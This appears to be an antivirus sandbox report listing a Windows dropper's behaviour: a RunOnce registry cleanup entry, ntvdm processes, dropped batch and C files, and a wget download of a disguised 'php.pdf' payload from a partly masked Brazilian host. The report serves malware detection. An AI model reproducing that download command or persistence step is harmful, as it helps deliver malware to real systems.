Техническая информация
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce] 'wextract_cleanup0' = 'rundll32.exe <SYSTEM32>\advpack.dll,DelNodeRunDLL32 "%TEMP%\IXP000.TMP\"'
- 'C:\ROOT\WGET.EXE' -c http://br####a.xpg.com.br/php.pdf
- '<SYSTEM32>\ntvdm.exe' -f -i2
- '<SYSTEM32>\ntvdm.exe' -f -i1
- C:\ROOT\BAT.BAT
- C:\ROOT\BAT2.BAT
- %WINDIR%\Temp\scs4.tmp
- %WINDIR%\Temp\scs2.tmp
- %WINDIR%\Temp\scs3.tmp
- C:\ROOT\BAT3.BAT
- C:\ROOT\WGET.EXE
- C:\ROOT\php.pdf
- C:\ROOT\VERSION.C
- C:\ROOT\URL.C
- C:\ROOT\URL.H
- %WINDIR%\Temp\scs1.tmp
- %TEMP%\IXP000.TMP\BAT4.BAT
- %TEMP%\IXP000.TMP\CONFIG~1.WAT
- %TEMP%\IXP000.TMP\BAT3.BAT
- %TEMP%\IXP000.TMP\BAT.BAT
- %TEMP%\IXP000.TMP\BAT2.BAT
- %TEMP%\IXP000.TMP\MAKEFI~1.WAT
- %TEMP%\IXP000.TMP\VERSION.C
- %TEMP%\IXP000.TMP\WGET.EXE
- %TEMP%\IXP000.TMP\URL.H
- %TEMP%\IXP000.TMP\README~1.WGE
- %TEMP%\IXP000.TMP\URL.C
- %TEMP%\IXP000.TMP\URL.H
- %TEMP%\IXP000.TMP\URL.C
- %TEMP%\IXP000.TMP\README~1.WGE
- %TEMP%\IXP000.TMP\VERSION.C
- %TEMP%\IXP000.TMP\WGET.EXE
- %TEMP%\IXP000.TMP\BAT3.BAT
- %TEMP%\IXP000.TMP\BAT2.BAT
- %WINDIR%\Temp\scs3.tmp
- %WINDIR%\Temp\scs2.tmp
- %WINDIR%\Temp\scs1.tmp
- %WINDIR%\Temp\scs4.tmp
- %TEMP%\IXP000.TMP\MAKEFI~1.WAT
- %TEMP%\IXP000.TMP\CONFIG~1.WAT
- %TEMP%\IXP000.TMP\BAT4.BAT
- 'br####a.xpg.com.br':80
- br####a.xpg.com.br/php.pdf
- DNS ASK br####a.xpg.com.br
- ClassName: 'ConsoleWindowClass' WindowName: 'ntvdm-b08.b0c.390001'
- ClassName: 'ConsoleWindowClass' WindowName: 'ntvdm-af0.af4.380001'